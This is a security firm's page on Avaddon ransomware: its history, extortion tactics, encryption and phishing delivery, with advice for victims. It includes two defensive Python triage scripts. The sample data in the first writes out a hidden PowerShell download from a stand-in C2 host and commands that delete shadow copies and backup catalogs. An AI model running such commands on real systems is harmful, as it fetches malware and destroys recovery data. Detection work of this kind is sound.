+30 2106897383 info@tictaclabs.com

Avaddon Ransomware – Avaddon Decryptor

What Avaddon Ransomware is and how the Avaddon Decryptor works

Avaddon Ransomware first appeared in June 2020 and has remained a prominent threat since then. It was advertised on Russian-speaking hacking forums as a ransomware-as-a-service (RaaS) offering.

The video below shows how the Avaddon Decryptor and the Avaddon decryption process work.

Both the Australian Cyber Security Centre (ACSC) and the FBI have warned about attacks by criminals using the Avaddon ransomware. The FBI noted that Avaddon's operators had hit private companies, health services, airlines and construction companies in the US and other countries. In addition, Avaddon attackers stole recent SIM card data and banking information in an attack on Schepisi Communications, a service provider for the Australian telecommunications company Telstra.

In short, Avaddon attacks rely on well-known tactics. One distinctive step: before proceeding, the attackers make sure the victim is not located in the Commonwealth of Independent States (CIS).

Avaddon Decryption Process

In the following steps you can see how the Avaddon Decryptor works to decrypt your files.

There are important steps both before and after the actual decryption: you have to prepare your environment carefully and plan ahead before running the Avaddon Decryptor.

First and Second Avaddon Ransomware versions

Initially, the Avaddon operators advertised their malware by highlighting the following features:

  • Unique payloads written in C++
  • Full-file encryption with customisable parameters
  • Encrypted files cannot be decrypted by a third party
  • IOCP support for parallel file encryption
  • Continuous encryption of newly written files and newly connected media
  • Encryption of hidden files and volumes
  • Spreads across network shares (SMB, DFS) and terminates any process that blocks file encryption
  • Deletes the Recycle Bin contents, Volume Shadow Copies (VSS) and other recovery points

The operators also stress support for Windows 7 and later, and that the encryption is very thorough: all local and remote drives are encrypted.

2nd Avaddon version

In February 2021, Javier Yuste, a Spanish student, released a free decryption tool that let victims recover their files at no cost. The Avaddon operators reacted immediately.

They released an updated version of the Avaddon code, which rendered the free decryptor ineffective against this second version of Avaddon.

Ransom note and leakage blackmail


Like other ransomware operators, the Avaddon group threatens to publish victims' data on the dark web if they do not pay.

After gaining access to a victim's network, they leave a ransom note and at the same time post a warning on Avaddon's dark-web site announcing a possible data leak. The warning includes screenshots of files as proof that they had access to the victim's network.

If the victim does not pay within 3 to 5 days, the attackers increase the pressure by leaking roughly 5% of the stolen files as a .zip archive on the Avaddon site.

If the victim still does not pay after this partial leak, the attackers may publish the stolen files in full.

Avaddon Ransomware profile and mode of operation

Avaddon is crypto-locker ransomware written in C++. Once the attackers are inside the victim's network, encrypted files are given a new extension (.avdn in early samples, a random mix of letters in later ones).

The ransomware also deletes Volume Shadow Copies and other system backups. The ransom note then demands an amount that ranges from $150 to $900.

Additional threats

Because Avaddon uses strong encryption, no public decryption tool exists for files encrypted by its second version. Like other modern ransomware, it uses a hybrid scheme with AES-256 and RSA-2048 keys: each file is encrypted with a symmetric AES-256 key, and that key is in turn encrypted with the operators' RSA-2048 public key, so only the holder of the matching private key can recover it. Without that key from the attackers, the files cannot be decrypted.

Like REvil, Avaddon is sold as ransomware-as-a-service (RaaS). This means that even someone with limited technical skills can become an "affiliate" who spreads the malware; in return, the profits are split between the operators and the affiliate.

Method of infection

Avaddon's operators initially delivered the malware through phishing emails carrying a malicious attachment. The attachment poses as an image named IMG<random 6 digits>.jpg.js, but the double extension hides the fact that it is actually a JavaScript file. When run, the script downloads the Avaddon payload from an external C2 server using a combination of PowerShell and the BITS (Background Intelligent Transfer Service) tooling. Once the binary runs, it connects to https://api.myip.com to learn the external IP address of the victim's machine.

In 2021, Avaddon added DDoS attacks against victims as further leverage to make them pay.

Specific elements of Avaddon

  • The JavaScript downloaders are fairly simple: they use two built-in Microsoft tools, PowerShell and BITS, to pull the ransomware payload from the C2 server and execute it on the victim's machine.
  • Their main obfuscation technique is base64-encoded strings.
  • Once decoded, these strings reveal the commands the malware runs to delete shadow copies and backups.
  • The Avaddon binary itself uses several anti-debugging techniques.
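The two descriptions above (the IMG<6 digits>.jpg.js lure and the base64-encoded command strings in the downloader) can be turned into a small static triage routine. The following is an added example written for this page, not code from the Avaddon operators or from TicTac. The script sample, the C2 host name c2.example and the exact command lines inside it are constructed assumptions; the indicator keywords (vssadmin, wbadmin, bcdedit, bitsadmin, Start-BitsTransfer) are typical of the recovery-deleting and BITS-download commands the page mentions, not strings taken from a real sample.

```python
"""Static triage of an Avaddon-style JavaScript downloader (added example)."""
import base64
import re
import string

# Lure naming described on the page: IMG<6 random digits>.jpg.js.
# The trailing .js is the real type; .jpg is only there to look like a picture.
ATTACHMENT_RE = re.compile(r"^IMG\d{6}\.jpg\.js$", re.IGNORECASE)

# Candidate base64 literals: quoted runs of the base64 alphabet, 16+ chars.
B64_LITERAL_RE = re.compile(r"""["']([A-Za-z0-9+/]{16,}={0,2})["']""")

# Keywords are assumptions about what such commands typically contain; the page
# only says the decoded strings hold commands that delete shadow copies and
# backups, and that PowerShell/BITS fetch the payload and api.myip.com is queried.
INDICATORS = {
    "deletes_recovery": ("vssadmin", "wbadmin", "bcdedit", "shadowcopy"),
    "downloader": ("powershell", "bitsadmin", "start-bitstransfer"),
    "ip_lookup": ("api.myip.com",),
}


def is_lure_attachment(filename: str) -> bool:
    """True if the attachment name matches the IMG######.jpg.js lure pattern."""
    return ATTACHMENT_RE.match(filename) is not None


def decode_base64_literals(script: str) -> list:
    """Return every quoted literal in `script` that decodes to printable text."""
    decoded = []
    for literal in B64_LITERAL_RE.findall(script):
        try:
            raw = base64.b64decode(literal, validate=True)
        except ValueError:  # bad alphabet or padding: not really base64
            continue
        text = raw.decode("utf-8", errors="replace")
        if text and all(c in string.printable for c in text):
            decoded.append(text)
    return decoded


def classify(decoded: list) -> dict:
    """Group decoded strings by the indicator category they match."""
    hits = {name: [] for name in INDICATORS}
    for text in decoded:
        lowered = text.lower()
        for name, keywords in INDICATORS.items():
            if any(k in lowered for k in keywords):
                hits[name].append(text)
    return hits


def triage(filename: str, script: str) -> dict:
    """Combine the file-name check with the decoded-string check."""
    decoded = decode_base64_literals(script)
    hits = classify(decoded)
    lure = is_lure_attachment(filename)
    return {
        "lure_name": lure,
        "decoded": decoded,
        "hits": hits,
        "suspicious": lure or any(hits.values()),
    }


# Constructed sample attachment. The plaintext commands are assumptions and are
# base64-encoded here so the example stays self-contained and runs offline.
SAMPLE_COMMANDS = [
    "powershell -w hidden Start-BitsTransfer -Source http://c2.example/payload.exe -Destination a.exe",
    "vssadmin delete shadows /all /quiet",
    "wbadmin delete catalog -quiet",
    "https://api.myip.com",
]
SAMPLE_NAME = "IMG483920.jpg.js"
SAMPLE_SCRIPT = 'var sh = new ActiveXObject("WScript.Shell");\n' + "".join(
    f'var s{i} = "{base64.b64encode(cmd.encode()).decode()}";\n'
    for i, cmd in enumerate(SAMPLE_COMMANDS)
) + 'var note = "HelloWorldThisIsNotBase64Text";\n'  # long but not valid base64

if __name__ == "__main__":
    report = triage(SAMPLE_NAME, SAMPLE_SCRIPT)
    print("lure file name:", report["lure_name"])
    for category, strings in report["hits"].items():
        for s in strings:
            print(f"[{category}] {s}")
    print("suspicious:", report["suspicious"])
```

Run it as a script to see the decoded commands grouped by category; in a mail-gateway or sandbox pipeline you would feed `triage()` the real attachment name and script body instead of the constructed sample. Note that the padding check deliberately skips long plain words, so ordinary identifiers in the script do not produce false decodes.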

What should I do if my data has been encrypted by Avaddon?

If your files are infected with Avaddon:

  • Disconnect the system from the network.
  • Shut down the infected machine, as Avaddon can keep encrypting your data in the background.
  • Avoid negotiating with the attackers directly, as you may expose yourself to further exploitation.
  • Avaddon's encryption makes it unlikely that any quick fix will recover the files.

Contact TicTac to negotiate with the attackers on your behalf. We have the experience to help you recover your encrypted files.

How do I know that my system has been infected by Avaddon Ransomware?

If Avaddon has infected your system:

  • You can no longer open your files.
  • You are notified that your files have been encrypted: Avaddon leaves a text file named EXTENSION-readme.txt (where EXTENSION is the extension appended to the encrypted files) on the desktop and in every folder it has encrypted.
  • The ransom note from the Avaddon operators directs you to a Tor hidden service, where the attackers attempt to extort you.
  • Encrypted files carry an extension made of a random mix of lower-case and upper-case letters.
  • Your desktop wallpaper is very likely replaced with a threatening message.
  • CPU usage sits at 100% even when no applications are running.
  • The machine runs much slower than usual.
  • Your antivirus software is not working, or Avaddon has already disabled it.
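The two file-system indicators in the list above (a note named EXTENSION-readme.txt in the desktop and every encrypted folder, plus a shared extension on the encrypted files) are enough to scope an infection from a disk image. The following is an added example written for this page, not a TicTac tool: it finds the notes, derives the extension from each note's name, and counts the encrypted files per directory. Run it against a copy or a mounted forensic image of the affected volume, never on the live machine, which the page advises shutting down. The sample directory tree it builds is constructed, and the note-name pattern is taken from the page's description, so adjust NOTE_RE if a sample uses a different name.

```python
"""Scope an Avaddon-style infection from ransom notes and file extensions (added example)."""
import os
import re
import tempfile
from collections import Counter
from pathlib import Path

# Note name as described on the page: <EXTENSION>-readme.txt, where EXTENSION is
# the string appended to encrypted files (".avdn" early on, random letters later).
NOTE_RE = re.compile(r"^([A-Za-z]+)-readme\.txt$")


def find_ransom_notes(root: str) -> dict:
    """Return {extension: [note paths]} for every ransom note found under root."""
    notes = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            m = NOTE_RE.match(name)
            if m:
                notes.setdefault(m.group(1), []).append(os.path.join(dirpath, name))
    return notes


def count_encrypted_files(root: str, extension: str) -> Counter:
    """Count files ending in .<extension> under root, keyed by directory."""
    per_dir = Counter()
    suffix = "." + extension
    for dirpath, _dirs, files in os.walk(root):
        n = sum(1 for f in files if f.endswith(suffix))
        if n:
            per_dir[dirpath] = n
    return per_dir


def triage(root: str) -> dict:
    """Summarise the infection per extension: notes, encrypted files, directories."""
    report = {}
    for ext, paths in find_ransom_notes(root).items():
        counts = count_encrypted_files(root, ext)
        report[ext] = {
            "notes": len(paths),
            "encrypted_files": sum(counts.values()),
            "directories": len(counts),
        }
    return report


def build_sample_tree(infected: bool = True) -> str:
    """Constructed sample: a fake user profile, optionally after an infection."""
    root = Path(tempfile.mkdtemp(prefix="avaddon_triage_"))
    docs, desk = root / "Documents", root / "Desktop"
    docs.mkdir()
    desk.mkdir()
    (root / "notes.txt").write_text("untouched file")   # never encrypted
    if infected:
        # The extension ".avdn" is the early Avaddon extension named on the page.
        for name in ("report.docx.avdn", "budget.xlsx.avdn", "avdn-readme.txt"):
            (docs / name).write_text("constructed")
        (desk / "holiday.jpg.avdn").write_text("constructed")
        (desk / "avdn-readme.txt").write_text("constructed")
    return str(root)


if __name__ == "__main__":
    sample_root = build_sample_tree()
    for ext, summary in triage(sample_root).items():
        print(f".{ext}: {summary['encrypted_files']} encrypted files in "
              f"{summary['directories']} directories, {summary['notes']} ransom notes")
```

Point `triage()` at the mount point of the image instead of `build_sample_tree()` to get the real numbers; the per-extension breakdown also tells you whether more than one ransomware build touched the volume, since each build leaves its own extension and note name.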

Prevention and protection against Avaddon

To avoid falling victim to Avaddon ransomware, we recommend:

  • Keep backups of your data on external drives, in the cloud and in offline storage.
  • Scrutinise all incoming e-mail, especially attachments.
  • Do not open websites from unknown sources.
  • Use layered security controls such as firewalls, access controls, web filtering and mail filtering.
  • Finally, use two-factor authentication together with strong passwords, especially for remote-access services.

In any case, you can contact TicTac if you fall victim to Avaddon Ransomware. Our skilled staff can help you manage such an attack.

TicTac will guide you through the Avaddon decryption process and also provide legal and IT support, so that your organisation can get past the business interruption as fast as possible.